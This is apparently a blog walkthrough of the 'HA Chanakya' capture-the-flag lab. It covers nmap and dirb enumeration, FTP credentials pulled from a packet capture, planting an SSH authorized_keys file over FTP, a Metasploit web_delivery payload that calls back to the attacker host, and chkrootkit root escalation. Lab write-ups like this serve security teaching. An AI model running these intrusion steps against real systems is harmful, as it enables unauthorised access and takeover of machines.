Today we are going to solve our Boot to
Root challenge called “HA Chanakya”. We have developed this lab for the purpose
of online penetration practices. It is based on the Mastermind that took down
kingdoms, one and only Chanakya. Let’s Solve it!!
Download Here
Level: Intermediate
Task: To
Enumerate the Target Machine and Get the Root Access.
Penetration Methodologies
·
Network Scanning
o
Netdiscover
o
Nmap Scan
·
Enumeration
o
Browsing HTTP Service
o
Getting FTP Login Credentials
o
FTP Login
·
Exploitation
o
Creating Authorized keys to
login via SSH
o
Transferring keys through FTP
o
Logging via SSH
o
Reading Chkrootkit logs
o
Getting a reverse connection
o
Spawning a TTY Shell
·
Privilege Escalation
o
Chkrootkit
Walkthrough
Network Scanning
After downloading, run the Machine in
VMWare Workstation. To work on the machine, we will be needing its IP Address.
For this, we will be using the netdiscover command. After matching the MAC and
IP Address we found the Virtual Machine IP Address to be 192.168.1.101.
netdiscover
Now that we have the Target Machine IP
Address, our next logical step would be to do a port scan on the target to get information
about the various services that are running on the target machine. After the
Aggressive Scan of all the ports, we see that we have the SSH service (22),
HTTP service (80), FTP service (21) running on the Target Machine.
nmap -A 192.168.1.101
Enumeration
Moving on, we observed that we have the
HTTP service running. It is probable that a web page is hosted. So, we decided
to take a look through our Web Browser. We did a thorough browsing of the
webpage. We went through its source code and images, but there was no way in or
any hint.
Till now we didn’t find any hint to
establish our foothold, therefore we chose DIRB for directory brute force
attack and Luckily found abuse.txt. After finding the abuse.txt, we decided to
download this file to our attacker system for a close inspection. We used the
wget command to download this file. Upon opening the file, we see that it
contains some text that doesn’t make much sense. It must be encrypted.
dirb http://192.168.1.101/ -X .txt
abuse.txt
wget http://192.168.1.101/abuse.txt
cat abuse.txt
nfubxn.cpncat
After searching on the Internet for a while
we found that ROT13 resembles to the text we found. So, we decided to decode
the text using the ROT13 Decrypter found here.
When we decrypted the encoded text to be the name of a packet capture
file. Let’s find this file.
ashoka.pcapng
We decide to run the wget command directly
on the IP Address in a hope that the packet capture file would be in the
/var/www/html/ directory. Our suspicion was correct, the file was swiftly
downloaded in our attacker machine. After downloading to inspect the file, we
decided to inspect the file using Wireshark.
wget http://192.168.1.101/ashoka.pcapng
wireshark ashoka.pcapng
Opened the captured file in Wireshark,
followed the tcp stream of ftp traffic and got one username ashoka and password
kautilya.
User: ashoka
Pass: kautilya
Now that we have the FTP login credentials,
we logged into the FTP Server. After logging in we ran the ls command to look
around. We found ourselves in the root directory. So, we decided to make our
way through ssh with placing the keys at this location. For that we created a
directory named “.ssh”. After traversing in this newly created directory we
went back to our native terminal.
ftp 192.168.1.101
ashoka
kautilya
ls -la
mkdir .ssh
cd .ssh
Exploitation
Now time to generate some ssh keys. We used
the ssh-keygen to create some keys. We entered the password as “123”. This can
be anything of your choice. We kept it so that its easy to remember. Moving on
after the key is created, we moved into the .shh directory on out native shell.
Here we saw that we have the key named “id_rsa.pub”. Now we need to upload this
key to FTP so we copied the contents of the is_rsa.pub in the file named
authorized_keys.
ssh-keygen
cd .ssh
ls
cat id_rsa.pub > authorized_keys
ls
We moved the authorized_keys to the home
directory so that it is easier to transfer the file using the File Transfer Protocol.
Now using the put command we transferred the file to the target machine.
put authorized_keys
ls
Now we will be connecting to the target
machine using the ssh. It will be possible to login now due to the authorized
keys we placed earlier. We got a shell of the Ashoka user. After some
enumeration, we see that we have a logs file inside the temp file. We tried to
take a look at it using the cat command.
It definitely looks like a Chkrootkit test results log. This is clue
that we might be able to escalate privileges on this machine using Chkrootkit.
ssh ashoka@192.168.1.101
ls /tmp
cat /tmp/logs
Privilege Escalation
Now to Escalate Privileges on the target machine, we are going to need a meterpreter on the target machine which we are going to use get root with the help of the Metasploit. To do this we decided to take a meterpreter using the web_delivery exploit. First, we selected the web_delivery exploit with the help of use command followed by providing the lhost. Lhost is the IP Address of our target machine (Kali Linux). At the end we will type in exploit. This will create a one line script for us that will give us a meterpreter over the target machine.
Now to Escalate Privileges on the target machine, we are going to need a meterpreter on the target machine which we are going to use get root with the help of the Metasploit. To do this we decided to take a meterpreter using the web_delivery exploit. First, we selected the web_delivery exploit with the help of use command followed by providing the lhost. Lhost is the IP Address of our target machine (Kali Linux). At the end we will type in exploit. This will create a one line script for us that will give us a meterpreter over the target machine.
use exploit/multi/script/web_delivery
set lhost 192.168.1.107
exploit
We copied the said command generated by the
exploit and ran over the ssh session we got earlier.
This gave us the session we required to
work. We are going to use the inbuilt exploit in the Metasploit that could help
us get root shell over the target machine. We selected the session and provide
the port for another session. After typing in exploit we see that the exploit
is working and it gave us another shell over the port mentioned earlier.
use exploit/unix/local/chkrootkit
set session 1
set lport 8888
exploit
To convert the shell into a proper working
shell, we ran the python one liner to spawn a TTY shell. We looked around and
found a text file name final.txt, we opened it to find the final flag. We did
it. This concludes this lab.
python -c 'import pty;pty.spawn("/bin/bash")'
ls
cat final.txt
0 comments:
Post a Comment